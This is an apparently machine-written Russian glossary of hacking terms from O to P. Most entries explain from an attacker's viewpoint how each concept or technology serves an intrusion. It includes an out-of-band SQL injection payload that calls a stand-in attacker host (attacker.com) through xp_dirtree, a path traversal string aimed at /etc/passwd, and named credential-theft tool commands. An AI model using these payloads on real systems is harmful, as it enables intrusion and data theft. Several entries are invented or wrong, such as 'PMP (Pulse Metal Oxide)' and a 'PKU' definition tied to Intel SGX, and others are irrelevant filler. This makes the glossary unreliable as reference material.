OSI Model Модель взаимодействия открытых систем (7 уровней). В атаках используются все уровни: физический (USB-drops), сетевой (ARP poisoning), транспортный (SYN flood), прикладной (XSS, SQL injection).

OSINT (Open Source Intelligence) Разведка по открытым источникам (Open Source Intelligence) сбор информации из публичных данных: социальные сети (LinkedIn, Twitter, Instagram), форумы, DNS, WHOIS, Shodan, Censys, GitHub, Google dorks, Wayback Machine. OSINT используется для: сбора email-адресов сотрудников, IP-адресов, технологического стека, информации о партнерах, поиска утекших ключей. ShinyHunters использует OSINT для поиска Salesforce Experience Cloud сайтов.

OSP (Open Settlement Protocol) Протокол для биллинга в телекоммуникациях. В контексте атак не является ключевым термином. Может быть целью для атак на VoIP-биллинг.

OSS (Open Source Software) Открытое ПО. OSS уязвимо к supply chain атакам (компрометация репозиториев, зависимостей). Атакующие могут внедрить backdoor в OSS, который затем попадет в корпоративные приложения.

OT (Operational Technology) Операционные технологии: промышленные системы управления (SCADA, PLC, DCS). OT-сети часто изолированы от IT-сетей (air gap). Атаки на OT могут иметь физические последствия (отключение электричества, разрушение оборудования). Handala атаковала Stryker (medical device manufacturer) через IT (Intune), не напрямую OT.

OT Security Безопасность операционных технологий. OT Security включает: сегментацию сетей (air gap), мониторинг протоколов (Modbus, DNP3), защиту PLC. Для атакующего OT Security препятствие: нужно найти мост между IT и OT (jump box, dual-homed хост).

OTP (One-Time Pad) Абсолютно стойкое шифрование, использующее ключ длиной с сообщение (one-time pad). Ключ используется один раз и уничтожается. В реальности OTP не используется из-за проблемы распространения ключей. В контексте атак термин OTP также используется для одноразовых паролей (one-time password), но это другое.

OTP (One-Time Password) Одноразовый пароль (One-Time Password), используемый в MFA: SMS-коды, TOTP (Google Authenticator), push-уведомления, аппаратные токены. OTP цель для AiTM (Adversary-in-the-Middle), SIM-swapping (перехват SMS), vishing (сброс MFA через helpdesk), MFA fatigue.

OTX (Open Threat Exchange) Платформа AlienVault для обмена информацией об угрозах. Для атакующего OTX угроза: если его IoC попадут в OTX, они станут известны защитникам.

OUI (Organizationally Unique Identifier) Первые 24 бита MAC-адреса, идентифицирующие производителя оборудования. OUI используется в OSINT для определения типа устройства (Apple, Cisco, HP). В атаках OUI может быть использован для fingerprinting.

Out-of-Band (OOB) Внеполосная передача данных. В атаках OOB используется для: C2 через каналы, не контролируемые основной системой (например, ICMP, DNS), эксфильтрации (DNS-туннели). OOB-каналы сложнее обнаружить, потому что они не используют стандартные порты (80, 443).

Out-of-Band SQL Injection SQL-инъекция, использующая внеполосный канал (DNS, HTTP) для извлечения данных, когда результаты не выводятся на страницу (blind). Пример: SELECT * FROM users WHERE id=1; exec xp_dirtree '\\attacker.com\share' запрос к SMB-шаре атакующего, в URL кодируются данные.

Outlook Почтовый клиент Microsoft. Outlook цель для: фишинга (вредоносные вложения), BEC (компрометация почтовых ящиков), макросов (VBA). Outlook также используется для C2 через правила (правила Outlook могут запускать скрипты).

Over-Permission Избыточные права: пользователь или сервис имеет больше прав, чем необходимо. Over-permission основная уязвимость, которую эксплуатирует ShinyHunters (guest user в Salesforce). Для атакующего поиск over-permission ключевая задача.

Over-Privileged Account Учетная запись с избыточными правами (например, обычный пользователь локальный администратор). Over-privileged account используется для LPE, lateral movement. ShinyHunters ищет over-privileged guest user в Salesforce.

Over-Privileged Integration Интеграция между сервисами (Salesforce-Okta, AWS-Azure) с избыточными правами. Компрометация одного сервиса дает доступ к другому. ShinyHunters использует over-privileged integrations для cloud-to-cloud атак.

Overflow (Buffer) Переполнение буфера: запись данных за пределы выделенной памяти. Приводит к: крашу, выполнению кода (если перезаписан return address). Buffer overflow классическая уязвимость, все еще встречается в legacy-системах, IoT.

OVF (Open Virtualization Format) Формат виртуальных машин. Вредоносные OVF могут содержать малварь, которая выполняется при развертывании VM.

OWASP (Open Web Application Security Project) Сообщество по безопасности веб-приложений (Open Web Application Security Project). OWASP Top 10 список наиболее критических уязвимостей веб-приложений (2021 версия: Broken Access Control, Cryptographic Failures, Injection, Insecure Design, Security Misconfiguration, Vulnerable Components, Identification and Authentication Failures, Software Data Integrity Failures, Security Logging Failures, SSRF). Для атакующего OWASP карта: атакуем то, что в Top 10, потому что многие организации не исправляют эти уязвимости.

OWASP Top 10 Список 10 наиболее критических уязвимостей веб-приложений (2021 версия: Broken Access Control, Cryptographic Failures, Injection, Insecure Design, Security Misconfiguration, Vulnerable Components, Identification and Authentication Failures, Software Data Integrity Failures, Security Logging Failures, SSRF). Для атакующего OWASP Top 10 список целей.

OWL (One-Way Light) В контексте data diode однонаправленная оптическая передача.

OWL (Web Ontology Language) Язык веб-онтологий (OWL) стандарт для представления онтологий в семантическом вебе. Используется в системах искусственного интеллекта, анализа данных. В контексте атак OWL может быть использован в OSINT (извлечение структурированных данных из публичных онтологий) или в AI-атаках (model poisoning через онтологии). Однако в реальных атаках встречается редко, в основном в исследовательских работах.

Owner (AD) Владелец объекта в Active Directory. Владелец может изменять разрешения. Атакующий, получив права владельца, может предоставить себе доступ.

Ownership Владение объектом. В Windows Take Ownership право, позволяющее стать владельцем объекта. Используется для обхода ACL.

Oxygen В контексте атак Oxygen Oxygen Forensics, инструмент для извлечения данных из мобильных устройств. Используется law enforcement.

Oyster В контексте атак Oyster OysterVPN, используемый для обхода блокировок.

P

P2P (Peer-to-Peer) Равноправная сеть, где узлы общаются напрямую, без центрального сервера. В ботнетах P2P используется для C2: зараженные машины обмениваются командами между собой, что делает ботнет устойчивым к takedown (нет единого C2). Пример: Storm botnet, Zeus P2P. P2P-ботнеты сложнее детектировать и уничтожать.

PaaS (Platform as a Service) Облачная платформа как услуга (Heroku, Google App Engine, Azure App Services). PaaS используется для: развертывания фишинговых сайтов, C2, автоматизации. Компрометация PaaS-аккаунта (через украденные ключи) дает возможность размещать вредоносные приложения на легитимных доменах.

Packer Упаковщик (packer) программа, сжимающая и шифрующая исполняемый файл, чтобы усложнить анализ. Упакованная малварь имеет точку входа в упаковщик, который распаковывает и запускает оригинальный код. Популярные packers: UPX, Themida, VMProtect. Распаковка (unpacking) процесс восстановления оригинального кода.

Packing Упаковка: процесс сжатия/шифрования исполняемого файла для обхода антивирусов. Упакованный бинарник имеет высокую энтропию, что может быть сигнатурой для некоторых антивирусов, но затрудняет статический анализ.

PAD (PAD file) XML-файл, описывающий программное обеспечение. В атаках PAD может быть использован для распространения информации о вредоносном ПО.

Padding Oracle Attack Атака на режимы шифрования CBC (Cipher Block Chaining), использующая информацию о корректности padding. Позволяет расшифровать данные без ключа. Padding oracle attack использовалась против ASP.NET, SharePoint, TLS. Для атакующего padding oracle способ расшифровки cookies, сессионных данных.

Palo Alto Networks Вендор сетевой безопасности (firewalls, XDR). Уязвимости в PAN-OS (CVE-2024-3400) эксплуатировались для RCE. Для атакующего Palo Alto цель для initial access.

PAM (Pluggable Authentication Modules) Модули аутентификации Linux. PAM конфигурирует политики аутентификации (пароли, MFA). Misconfig в PAM может привести к обходу аутентификации.

PAM (Privileged Access Management) Управление привилегированным доступом (CyberArk, BeyondTrust). PAM изолирует учетные записи администраторов, требует дополнительной аутентификации. Для атакующего PAM препятствие: даже получив пароль администратора, может не быть возможности его использовать без дополнительного подтверждения.

PAN (Personal Area Network) Персональная сеть (Bluetooth, NFC). Атаки на PAN: BlueBorne, Bluesnarfing, NFC relay.

PAN-OS Операционная система для устройств Palo Alto. Уязвимости PAN-OS (например, CVE-2024-3400, RCE) позволяют получить доступ к корпоративным сетям.

Paper (White Paper) Документ, описывающий технологию или атаку. Для атакующего white papers источник информации о новых TTPs, уязвимостях, техниках evasion.

PAR (Parameter) Параметр запроса (URL, POST, JSON). Параметры цель для: SQL injection, XSS, command injection, IDOR. ShinyHunters использовал параметры API Salesforce для эксфильтрации.

Parity (RAID) Контроль четности в RAID-массивах. В атаках уничтожение parity может сделать восстановление данных невозможным.

Parking (Domain) Припаркованный домен. Используется для: C2 (домен зарегистрирован, но не используется), typosquatting (похожие домены).

Parrot OS Дистрибутив Linux для пентеста (альтернатива Kali). Parrot включает инструменты для OSINT, forensics, криптографии. Используется атакующими для разведки.

Parsing Разбор данных (JSON, XML, HTML). Уязвимости парсеров: XML external entity (XXE), deserialization, buffer overflow. Для атакующего атаки на парсеры способ RCE.

Partition (Disk) Раздел диска. В атаках: уничтожение partition table (wiper), скрытие данных в неразмеченных разделах.

Pass-the-Cookie Техника аутентификации с использованием украденных cookies (сессионных токенов). После кражи cookies через XSS или инфостилер, атакующий может войти в аккаунт без пароля и MFA. Pass-the-cookie обходит MFA, потому что сессия уже аутентифицирована.

Pass-the-Hash (PtH) Техника аутентификации с использованием NTLM-хэша вместо пароля. Атакующий извлекает NTLM-хэш (через Mimikatz, дамп LSASS) и использует его для входа на другие системы (через SMB, RDP, WMI). Pass-the-Hash не требует знания plaintext пароля. Инструменты: Mimikatz (sekurlsa::pth), Impacket (psexec.py -hashes).

Pass-the-Ticket (PtT) Техника аутентификации с использованием Kerberos-билетов. Атакующий извлекает TGT или service ticket (через Mimikatz) и использует его для доступа к ресурсам. Pass-the-Ticket может быть использован для lateral movement без знания пароля.

Passive Reconnaissance Пассивная разведка: сбор информации без взаимодействия с целью (OSINT, DNS, Shodan). Не оставляет следов в логах цели. Отличается от активной разведки (сканирование портов), которая может быть обнаружена.

Password Cracking Взлом паролей: восстановление plaintext из хэша. Методы: brute force (перебор всех комбинаций), dictionary attack (перебор по словарю), rainbow tables (предвычисленные хэши), rule-based атаки (комбинации). Инструменты: Hashcat, John the Ripper.

Password Manager Менеджер паролей (LastPass, 1Password, Bitwarden, KeePass). Менеджеры паролей цель для инфостилеров: кража зашифрованной базы, перехват ввода (keylogger). Компрометация менеджера паролей дает доступ ко всем паролям жертвы.

Password Spraying Атака, при которой один пароль (например, "Password123") пробуется против множества учетных записей. В отличие от brute force (много паролей против одной учетки), password spraying обходит блокировки после неудачных попыток. Эффективна против учетных записей со слабыми паролями.

Patch Исправление (обновление) для устранения уязвимости. Для атакующего patch означает, что уязвимость стала 1-day: нужно атаковать непропатченные системы. Временное окно между выходом patch и его установкой окно возможностей. Interlock имел 36 дней zero-day window до patch, затем еще время, пока patch устанавливается.

Patch Management Управление обновлениями. Плохой patch management одна из главных уязвимостей организаций. Для атакующего организации с медленным patch management легкие цели.

Path (Attack) Путь атаки: последовательность шагов от initial access до цели (Domain Admin, данные). BloodHound визуализирует attack paths в AD. Для атакующего поиск кратчайшего attack path ключевая задача.

Path Traversal Уязвимость, позволяющая читать файлы за пределами веб-корня (directory traversal). Пример: ../../../../etc/passwd. Path traversal используется для кражи файлов конфигурации, исходного кода.

Payload Полезная нагрузка: код, который выполняется на целевой системе после успешной эксплуатации. Payload может быть: reverse shell, meterpreter, infostealer, ransomware. Payload часто доставляется через dropper, загружается in-memory.

Payload (Stage) Стейдж-пейлоад: первая стадия, которая загружает основной payload. Используется для уменьшения размера initial payload и обхода детектов.

PBX (Private Branch Exchange) Корпоративная телефонная станция. PBX используется в vishing-атаках: атакующий звонит через PBX, маскируясь под внутренний номер. Компрометация PBX позволяет прослушивать разговоры, перенаправлять звонки.

PCAP (Packet Capture) Захват сетевых пакетов (Wireshark, tcpdump). PCAP используется для: анализа атак (forensics), обнаружения C2, изучения протоколов. Для атакующего PCAP угроза: если трафик перехвачен, могут быть видны незашифрованные данные, паттерны C2.

PCI DSS (Payment Card Industry Data Security Standard) Стандарт безопасности данных платежных карт. PCI DSS требует шифрования данных карт, ограничения доступа, мониторинга. Нарушение PCI DSS влечет штрафы до $100,000 в месяц. Для атакующего PCI DSS leverage в extortion: угроза сообщить о нарушении.

PCL (Printer Command Language) Язык команд для принтеров. Атаки на принтеры: кража данных (документы, прошедшие через принтер), DoS, выполнение кода (через уязвимости в прошивке).

PCRE (Perl Compatible Regular Expressions) Библиотека регулярных выражений. Уязвимости PCRE могут привести к DoS (ReDoS Regular Expression Denial of Service) через экспоненциальный backtracking.

PDB (Program Database) Отладочный файл (Microsoft), содержащий символы (имена функций, переменных). PDB-файлы могут быть извлечены из бинарников (или утечь на общедоступные серверы). Для атакующего PDB источник информации о структуре программы, поиск уязвимостей.

PDF (Portable Document Format) Формат документов. PDF используется в фишинге: вредоносные вложения (с JavaScript, ссылками), эксплойты (CVE-2018-4993, CVE-2022-42889). PDF может содержать ссылки на внешние ресурсы (SMB-шары), крадущие NTLM-хэши.

PDP (Policy Decision Point) Компонент контроля доступа (XACML, ABAC). Для атакующего PDP цель: misconfig в политиках может дать доступ.

PDP (Power Distribution Panel) В дата-центрах. Атаки на PDP (отключение питания) могут привести к физическому уничтожению серверов.

PEM (Privacy-Enhanced Mail) Формат сертификатов (Base64). PEM-файлы содержат сертификаты и приватные ключи. Кража PEM-файлов (из конфигураций, дампа памяти) дает атакующему приватные ключи.

PEN (Penetration Testing) Пентест: тестирование на проникновение. Для атакующего пентест то, чем он занимается, но без разрешения.

Pentest См. Penetration Testing. Penetration Testing (пентест) тестирование на проникновение: авторизованная имитация атак для оценки защищенности системы. Пентест включает: рекогносцировку, сканирование, эксплуатацию уязвимостей, пост-эксплуатацию, составление отчета. Для атакующего пентест то, чем он занимается, но без разрешения.

PEP (Policy Enforcement Point) Компонент контроля доступа, enforcing policies. Для атакующего обход PEP цель.

Perfect Forward Secrecy (PFS) Свойство протоколов шифрования (TLS с ECDHE), при котором компрометация долговременного ключа сервера не позволяет расшифровать прошлые сессии. Для атакующего PFS препятствие: даже получив приватный ключ сервера, нельзя расшифровать перехваченный трафик. Нужно атаковать конечные устройства.

Performance Производительность. В атаках на криптовалюты используются атаки на производительность (блокчейн спам, DoS).

Perimeter Периметр сети (firewalls, IDS/IPS, VPN). В 2026 perimeter устаревает из-за облака, BYOD, SaaS. Атакующие атакуют не периметр, а identity и SaaS.

Perl Язык программирования. Perl используется в CGI-скриптах (legacy). Уязвимости Perl: command injection, path traversal.

Persistence Закрепление: методы, позволяющие сохранить доступ после перезагрузки системы, смены паролей, обнаружения. Методы: scheduled tasks, WMI subscriptions, registry run keys, services, startup folder, backdoor в BIOS/UEFI, SSH-ключи, веб-шеллы.

Persistence Mechanism Механизм закрепления (автозагрузка, службы, планировщик). Для атакующего выбор persistence mechanism зависит от уровня привилегий (пользовательский, SYSTEM, kernel).

Personal Data (PII) Персональные данные (Personally Identifiable Information): имя, адрес, SSN, email, телефон, дата рождения. Утечка PII (Conduent, Wynn) используется для identity theft, credential stuffing, extortion.

Personally Identifiable Information (PII) Персональные данные (Personally Identifiable Information) любая информация, которая может быть использована для идентификации конкретного человека: имя, фамилия, адрес, номер телефона, email, дата рождения, номер социального страхования (SSN), номер водительских прав, номер паспорта, медицинские данные, финансовая информация, биометрические данные, IP-адрес (в некоторых юрисдикциях), данные о местоположении. В контексте кибератак PII главная цель: кража PII используется для identity theft (кража личности), credential stuffing, BEC (Business Email Compromise), extortion (вымогательство), продажи на даркнет-рынках (fullz). Утечки PII (Conduent 25M+ записей, Wynn 800k записей) приводят к многомиллионным штрафам (GDPR, HIPAA, CCPA) и коллективным искам. Для атакующего PII товар и инструмент: с помощью PII можно создавать synthetic identity (синтетические личности), обходить KYC, проводить targeted phishing.

Perturbation (AI) Возмущение в AI: небольшое изменение входных данных, приводящее к неправильной классификации (adversarial attack). Для атакующего adversarial AI способ обойти ML-детекты (EDR, CAPTCHA).

Petya Ransomware/wiper (2016-2017). Petya шифровал MFT, затем NotPetya (wiper) использовал схожие методы. В 2026 legacy.

PFSense Open-source firewall/router. PFSense используется в корпоративной среде, особенно SMB. Уязвимости PFSense могут дать доступ к сети.

PGP (Pretty Good Privacy) Протокол шифрования email. PGP используется для защиты коммуникаций (наряду с Signal). Для атакующего PGP препятствие для перехвата email, но ключи могут быть украдены (инфостилер, дамп памяти).

PH (Power Hardware) В контексте атак на дата-центры: отключение питания.

Pharming Атака, перенаправляющая пользователя с легитимного сайта на фальшивый без его ведома (через DNS poisoning, компрометацию DNS-сервера). Pharming используется для кражи паролей, сессий.

Phishing Фишинг: отправка поддельных email/SMS, имитирующих легитимные организации, с целью кражи учетных данных, установки малвари. Типы: spear phishing (целевой), whaling (на C-level), vishing (голосовой), smishing (SMS), quishing (QR-код). В 2026 phishing с использованием AI (deepfake, генерация писем) становится более эффективным.

Phishing Kit Набор инструментов для фишинга: готовые страницы, имитирующие легитимные сайты (банки, Microsoft, Google), скрипты для сбора данных, инструменты для отправки email. Phishing kits продаются на даркнете.

PHP (Hypertext Preprocessor) Язык программирования для веб-приложений. PHP-приложения уязвимы к: SQL injection, RCE (eval, unserialize), LFI, RFI, file upload. Webshell на PHP классический backdoor.

PHP Object Injection Уязвимость в PHP, когда unserialize() вызывается на пользовательских данных, что позволяет выполнить произвольный код (RCE) через gadget chain. Аналогична Java deserialization.

Physical Pentesting Физический пентест: проникновение в офис, дата-центр, на объект. Методы: tailgating, lockpicking, RFID-клонирование, USB-дропы, social engineering (представление сотрудником). Physical pentest может обойти даже air gap.

PIC (Position Independent Code) Позиционно-независимый код, который может выполняться по любому адресу. Shellcode обычно PIC. Используется в memory-only payloads.

PID (Process Identifier) Идентификатор процесса. PID используется в process injection: атакующий открывает процесс по PID, выделяет память, записывает shellcode, создает поток.

Piggybacking Физический метод проникновения: следование за сотрудником в закрытую зону, используя его пропуск, не вызывая подозрений. Атакующий идет вплотную за сотрудником, который открывает дверь своим пропуском, и проскальзывает внутрь, пока дверь открыта. Piggybacking синоним tailgating. Используется в физическом пентесте для доступа в офисы, дата-центры, защищенные зоны. Защита: турникеты (man-traps), требующие однократного прохода; обучение сотрудников не пропускать незнакомцев; биометрические системы с контролем прохода одного человека.

PII (Personally Identifiable Information) Персональные данные (Personally Identifiable Information): имя, адрес, SSN (номер социального страхования), email, телефон, дата рождения, номер водительских прав, медицинские данные, финансовая информация. Утечка PII (Conduent 25M+, Wynn 800k) используется для identity theft, credential stuffing, extortion. Для атакующего PII товар на даркнете (fullz).

PIN (Personal Identification Number) ПИН-код (карты, телефона). PIN может быть украден через keylogger, shoulder surfing, или извлечен из дампа памяти. В carding PIN используется для снятия наличных.

Ping Утилита для проверки доступности хоста (ICMP Echo). Ping используется для: разведки (определение живых хостов), C2 (ICMP-туннели), DoS (ping flood).

Ping of Death DoS-атака, отправляющая ICMP-пакет размером больше 65535 байт, вызывающий переполнение буфера на старых системах. В 2026 legacy.

Ping Sweep Сканирование сети с помощью ping для определения живых хостов. Инструменты: fping, nmap -sn.

Pingback В C2-коммуникациях: агент отправляет pingback (heartbeat) C2 для подтверждения активности.

Pinning (Certificate) Привязка сертификата (certificate pinning): приложение фиксирует ожидаемый сертификат или публичный ключ сервера, игнорируя доверенные корневые центры. Pinning защищает от MITM. Для атакующего pinning препятствие: нужно атаковать приложение, отключить pinning, или скомпрометировать приватный ключ сервера.

Pinning (Memory) Фиксация страниц памяти (memory pinning), чтобы они не были выгружены на диск. В атаках pinning может использоваться для предотвращения выгрузки чувствительных данных (паролей) на диск.

PINS (Personal Identification Number) ПИН-код (Personal Identification Number) числовой пароль для карт, телефонов, устройств. PIN может быть украден через keylogger, shoulder surfing, или извлечен из дампа памяти. В carding PIN используется для снятия наличных в банкоматах.

PIP (Python Package Index) Репозиторий Python-пакетов. Supply chain атаки через PyPI: публикация вредоносных пакетов с похожими именами (typosquatting) или компрометация легитимных пакетов. Разработчики, устанавливая пакеты, получают малварь.

Pipeline (CI/CD) Конвейер непрерывной интеграции/доставки. Supply chain атаки на pipeline: компрометация build server, внедрение вредоносного кода в артефакты, кража secrets из переменных окружения.

PIR (Personal Information Record) Запись персональных данных. PIR цель утечек.

Pivot Переход (pivot) из скомпрометированной системы в другие сегменты сети. Используется для lateral movement. Pivot может быть: через RDP, SSH, прокси, SMB, WMI, PsExec, DCOM.

PKCS (Public Key Cryptography Standards) Стандарты криптографии с открытым ключом (PKCS #12 для хранения сертификатов, PKCS #7 для подписи). PKCS-файлы (.p12, .pfx) содержат приватные ключи. Кража PKCS-файлов дает атакующему приватные ключи.

PKI (Public Key Infrastructure) Инфраструктура открытых ключей: удостоверяющие центры, сертификаты, CRL. Компрометация PKI (например, кража корневого ключа CA) позволяет подписывать любые сертификаты (malware подписанный доверенным CA). Используется в APT-атаках.

PKINIT Расширение Kerberos для аутентификации по сертификатам. Атаки на PKINIT: ESC1-8 (Certified Pre-Owned) получение сертификата от имени администратора домена.

PKU (Page Key Update) Механизм управления ключами страниц в Intel SGX (Software Guard Extensions). PKU используется для изоляции памяти в защищенных enclave. В контексте атак PKU может быть целью для атак на SGX (side-channel, атаки на память). Однако это узкоспециализированный термин из области исследования безопасности аппаратных enclave, не ключевой для общего хакерского словаря.

PL (Programming Language) Язык программирования. Выбор языка для малвари: C/C++ (нативный, сложнее реверс), C# (.NET, легко модифицировать), PowerShell (безфайловый), Python (кроссплатформенный), Rust (безопасный, сложный реверс), Nim (редкий, меньше детектов).

PLC (Programmable Logic Controller) Программируемый логический контроллер, сердце промышленной автоматизации (ICS/SCADA). PLC управляет оборудованием (конвейеры, клапаны, насосы). Атаки на PLC: модификация прошивки (Stuxnet), изменение параметров (скорость, давление), DoS. Протоколы: Modbus, Profinet, EtherNet/IP.

PLD (Programmable Logic Device) Программируемое логическое устройство (FPGA, CPLD). Атаки на PLD: модификация прошивки, извлечение ключей.

PLM (Product Lifecycle Management) Управление жизненным циклом продукта. PLM-системы содержат интеллектуальную собственность. Для атакующего PLM цель.

PLT (Procedure Linkage Table) Таблица связей процедур в ELF-файлах (Linux). PLT используется для GOT (Global Offset Table). Атаки: GOT overwrite, PLT hijacking.

Pluggable Authentication Modules (PAM) Pluggable Authentication Modules (PAM) фреймворк аутентификации в Linux/Unix, позволяющий подключать различные модули (пароли, биометрия, смарт-карты). PAM конфигурируется через файлы в /etc/pam.d/. Misconfig в PAM может привести к обходу аутентификации или повышению привилегий.

PlugX RAT (Remote Administration Tool), используемый китайскими APT-группами (APT41). PlugX позволяет удаленное управление, кража данных, загрузка дополнительных модулей. В 2026 все еще используется в legacy-системах.

Plunder В контексте атак "plunder" сбор всех ценных данных после компрометации.

Plunder (Tool) Инструмент для сбора данных из скомпрометированных систем.

PM (Product Manager) Менеджер продукта. Цель для spear-phishing: PM имеют доступ к планам продуктов, данным клиентов.

PM (Project Management) Управление проектами. Jira, Trello цели для кражи данных о проектах, конфиденциальных документов.

PMBOK Project Management Body of Knowledge (PMBOK) свод знаний по управлению проектами от Project Management Institute (PMI). В контексте атак PMBOK может использоваться для: планирования сложных атак как проектов (декомпозиция на этапы, ресурсы, риски), управления командой в syndicate. Однако это не технический термин, а управленческий. В хакерском словаре встречается редко.

PMK (Pairwise Master Key) Ключ в Wi-Fi (WPA2). PMK используется для генерации ключей сессии. Атаки: KRACK (CVE-2017-13077) позволяет восстановить PMK.

PMP (Pulse Metal Oxide) В контексте атак не является ключевым термином. Может относиться к PMP (Project Management Professional) сертификации по управлению проектами, что не относится к хакерской тематике.

PNG (Portable Network Graphics) Формат изображений. PNG может содержать скрытые данные (steganography). Используется для: сокрытия малвари в изображениях (image-based steganography), C2 (данные в изображениях).

POC (Proof of Concept) Доказательство концепции: эксплойт или код, демонстрирующий уязвимость. Для атакующего POC основа для разработки эксплойта. После публикации POC уязвимость становится 1-day.

PoC (Proof of Concept) Доказательство концепции (Proof of Concept) эксплойт или код, демонстрирующий существование уязвимости. Для атакующего PoC основа для разработки эксплойта. После публикации PoC уязвимость становится 1-day (патч уже есть, но не везде установлен). PoC публикуются на Exploit-DB, GitHub, в блогах.

Pod (Kubernetes) Наименьший развертываемый объект в Kubernetes. Pod цель для container breakout. Атаки на Pod: кража секретов (из Kubernetes secrets), escape на хост.

Poisoning (Cache) Отравление кэша (DNS, ARP, HTTP). Используется для: MITM, перенаправления трафика, DoS.

Poisoning (Model) Отравление модели AI: внедрение вредоносных данных в обучающий набор.

Poker Игра покер. В контексте атак может использоваться в метафорах: "блефовать" при социальной инженерии, "читать оппонента" (понимать жертву), "ставить на кон" (рисковать). В техническом смысле не является термином.

POLP (Principle of Least Privilege) Принцип наименьших привилегий. Нарушение POLP over-privileged accounts цель атакующих.

Polyglot (File) Файл, который является одновременно корректным в нескольких форматах (например, PDF и ZIP). Polyglot используется для: обхода фильтров (файл проходит как PDF, но содержит малварь в ZIP-части), доставки малвари.

Polymorphic Code Полиморфный код: код, который меняет свою форму (шифрование, обфускация) при каждом распространении, сохраняя функциональность. Полиморфизм используется для обхода сигнатурных детектов. Каждый экземпляр малвари имеет уникальную сигнатуру.

PON (Passive Optical Network) Пассивная оптическая сеть. Атаки на PON: перехват трафика, DoS.

POP3 (Post Office Protocol) Протокол получения email. POP3 передает пароли в plaintext, если не используется TLS. Используется в legacy-системах.

Port Порт (TCP, UDP). Сканирование портов (nmap) первый этап рекогносцировки. Открытые порты (22 SSH, 3389 RDP, 443 HTTPS, 445 SMB) точки входа.

Port Forwarding Перенаправление портов. Используется для: доступа к внутренним сервисам из интернета, обхода firewalls, C2 (forward порт через SSH, Chisel).

Port Knocking Техника скрытия сервиса: порт открывается только после последовательности запросов на определенные порты (knock). Используется для сокрытия C2, SSH.

Port Scanning Сканирование портов (nmap, masscan). Активная разведка, может быть обнаружена. Атакующие используют slow scan, random scan, scan через прокси для сокрытия.

POS (Point of Sale) Торговый терминал (касса). POS-системы цель для carding (кража данных карт), malware (PoSeidon, BlackPOS). POS часто работают на старых Windows, не обновляются.

POST (HTTP) Метод HTTP для отправки данных. POST-запросы используются для: отправки форм, API-вызовов, C2 (данные в теле запроса). Атаки на POST: CSRF, SQL injection, XSS.

Post-Exploitation Пост-эксплуатация: действия после получения initial access: энумерация, lateral movement, повышение привилегий, эксфильтрация, persistence. Post-exploitation самый длительный этап атаки.

POT (Pot of Gold) В контексте атак "Pot of Gold" может относиться к "Golden Pot" метафоре для ценной цели (например, база данных с PII). Также существует RAT под названием "POT". В целом, не является стандартным термином.

PowerShell Среда автоматизации Microsoft. PowerShell используется атакующими для: безфайлового выполнения (Invoke-Expression), скачивания малвари, lateral movement (Invoke-Command), сбора данных. PowerShell ключевой инструмент для Windows-атак. ClickFix использует PowerShell.

PowerShell Empire C2-фреймворк для PowerShell (ранее Empire). Используется для post-exploitation на Windows. Empire имеет модули для дампа LSASS, lateral movement, persistence.

PowerShell Remoting (WinRM) Удаленное выполнение команд через PowerShell (WinRM). Используется для lateral movement. Требует административных прав.

PowerUp Модуль PowerSploit для поиска misconfig, позволяющих повысить привилегии (AlwaysInstallElevated, unquoted service paths). Используется для LPE.

PPID (Parent Process ID) Идентификатор родительского процесса. EDR анализирует отношения PPID-PID для обнаружения аномалий (например, Microsoft Word запускает PowerShell). Process injection и process hollowing нарушают эти отношения.

PPL (Protected Process Light) Защищенный процесс (Windows). PPL блокирует открытие процесса для чтения/записи (LSASS в PPL защищен). Обход PPL: через kernel exploit, BYOVD, или использование уязвимости в самом PPL.

PPP (Point-to-Point Protocol) Протокол соединения точка-точка. Используется в dial-up, VPN.

PPTP (Point-to-Point Tunneling Protocol) Устаревший VPN-протокол. PPTP уязвим (MS-CHAPv2 взломан). В 2026 не рекомендуется, но может использоваться в legacy-системах.

PR (Public Relations) В контексте атак PR публикация данных (leak) для давления на жертву. ShinyHunters использует leak site как PR-инструмент.

Pre-Authentication (Kerberos) Предварительная аутентификация в Kerberos. Отключение pre-authentication делает учетные записи уязвимыми к AS-REP Roasting.

Pre-Execution Действия перед выполнением малвари (разведка, проверка окружения). Используется для анти-сэндбокс.

Precision (AI) Точность AI-модели. В EDR precision важна для минимизации false positives. Для атакующего false positives союзник.

Precursor Индикатор, предшествующий атаке. В threat hunting ищут precursors.

Pretexting Социальная инженерия: создание вымышленного сценария (pretext) для получения информации или доступа. Пример: звонок в helpdesk как "сотрудник, забывший пароль". The Com использует pretexting в vishing.

Pretty Good Privacy (PGP) Протокол шифрования email (Pretty Good Privacy). PGP использует асимметричную криптографию (RSA, ECC) для шифрования и подписи сообщений. Для атакующего PGP препятствие для перехвата email, но ключи могут быть украдены (инфостилер, дамп памяти). PGP также используется для подписи кода, проверки целостности ПО.

Prevalence (Detection) Распространенность (детекта). Для атакующего важно, насколько широко используется его метод; если широко, он будет детектиться.

Prevention Предотвращение (IPS, EDR блокировка). Для атакующего prevention препятствие, которое нужно обходить.

Price (Dark Web) Цена на даркнете: fullz $50200, доступ к корпоративной сети $5005000, 0-day $100k$1M, RDP доступ $10100.

Prigogine Илья Пригожин физико-химик, лауреат Нобелевской премии (1977) за работы по неравновесной термодинамике. В контексте атак не является термином.

Primary Key (SQL) Первичный ключ в базе данных. В SQL injection атакующий может пытаться извлечь primary key для идентификации записей.

Printer Принтер. Принтеры цель: кража данных (документы, прошедшие печать), доступ к сети (принтеры часто имеют доступ к AD), DoS. Уязвимости: JetDirect, PJL (Printer Job Language).

Printer Command Language (PCL) Язык команд для принтеров (Printer Command Language) от HP. PCL используется в принтерах для управления печатью. Атаки на принтеры через PCL: кража данных (документы, прошедшие печать), DoS (бесконечная печать), выполнение кода (через уязвимости в прошивке), модификация настроек.

PrintNightmare Уязвимость в Windows Print Spooler (CVE-2021-34527), позволяющая выполнить код с привилегиями SYSTEM. Использовалась для LPE. В 2026 все еще актуальна для непропатченных систем.

PrintSpooler Служба печати Windows. Уязвимости PrintSpooler (PrintNightmare) используются для LPE и lateral movement.

Privacy (Data) Конфиденциальность данных. Нарушение privacy основа extortion.

Private Key Приватный ключ (RSA, EC). Приватный ключ используется для: расшифровки TLS-трафика, подписи кода, аутентификации (SSH, PKI). Кража приватного ключа дает атакующему возможность выдавать себя за владельца.

Private Vault Хранилище секретов (AWS Secrets Manager, Azure Key Vault, HashiCorp Vault). Цель для атакующего: кража ключей, паролей.

Privilege Escalation Повышение привилегий (LPE Local Privilege Escalation). Переход от обычного пользователя к SYSTEM (Windows) или root (Linux). Методы: kernel exploits, misconfigured services, credential theft (LSASS), BYOVD.

